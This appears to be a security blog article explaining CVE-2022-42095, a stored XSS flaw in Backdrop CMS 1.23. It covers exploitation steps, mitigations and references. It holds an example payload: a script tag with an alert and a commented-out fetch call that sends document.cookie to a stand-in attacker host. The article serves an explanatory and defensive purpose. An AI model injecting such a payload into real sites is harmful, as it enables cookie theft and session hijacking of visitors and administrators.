CVE-2022-42095 - Stored XSS Vulnerability in Backdrop CMS 1.23. Explained and Exploited

Backdrop CMS is a popular open-source content management system used by thousands of websites, particularly among those looking for a Drupal alternative. In October 2022, a security issue affecting version 1.23. surfaced: a stored cross-site scripting (XSS) vulnerability—tracked as CVE-2022-42095. This critical flaw allows attackers to inject malicious JavaScript into website pages, endangering site visitors and admins alike.

This article will break down the vulnerability in simple terms, show you how it can be exploited, and provide resources for further reading.

What is Stored XSS?

XSS (Cross-Site Scripting) is a vulnerability where an attacker injects malicious code into trusted webpages. "Stored XSS" is more dangerous than "reflected XSS" because the code is saved on the server and executed whenever a user visits the compromised content.

Usually, attackers use stored XSS to steal cookies, session tokens, or perform actions as another user.

Where’s the Flaw?

Backdrop CMS lets admins and certain users create "Pages" using its admin interface. In version 1.23., the "Page" content field did not sufficiently sanitize input, allowing an attacker to store arbitrary JavaScript code. Whenever any user—admin or otherwise—views the infected page, the JavaScript executes in their browser context.

Sources:
- NVD - CVE-2022-42095
- Backdrop CMS Change Log

Get Access:

Attackers often need some kind of access, like an unprivileged user, or they exploit a separate vulnerability to reach the page creation/editor function.

Inject Malicious Script:

In the "Page" creation/edit screen, they input malicious JavaScript in the "Content" field.

Trigger the Payload:

Once the page is saved, anyone visiting the page—including admins—will unknowingly run the mishandled script.

Here’s a code snipplet an attacker might use in the "Page" content

<h1>Welcome to our website!</h1>
<script>
  alert('XSS - CVE-2022-42095');
  // exfiltrate cookies (just an example, never do this)
  // fetch('http://attacker-website.com/log?cookie='; + document.cookie);
</script>

What happens?
Any visitor to this page sees an alert box pop up—and worse, real attackers could silently steal cookies, hijack sessions, or even trigger admin actions using CSRF.

Update Backdrop CMS

Always use the latest version from Backdrop CMS downloads. This flaw was patched in 1.23.1 and later.

Input Validation

Use filters to sanitize user content. Don’t rely solely on CMS updates—check custom modules/themes for unsafe print/echo statements.

Least Privilege Principle

Limit page creation/edit rights to trusted users only.

Regular Security Audits

Scan your site for vulnerabilities using tools like OWASP ZAP or Burp Suite.

References

- CVE-2022-42095: NVD Entry
- Backdrop CMS Issue #5412
- Backdrop CMS Security Release 1.23.1
- OWASP XSS Explained

In Conclusion

CVE-2022-42095 in Backdrop CMS is a prime example of how dangerous stored XSS can be, particularly when it affects core content types. By understanding how the exploit works, you can better secure your own sites and educate teammates or clients. Remember: update, sanitize, and audit—security is everyone’s job!


*If you’re running Backdrop CMS, update now. Spread the word—secure coding saves headaches and reputations!*

Timeline

Published on: 11/23/2022 02:15:00 UTC
Last modified on: 11/30/2022 14:28:00 UTC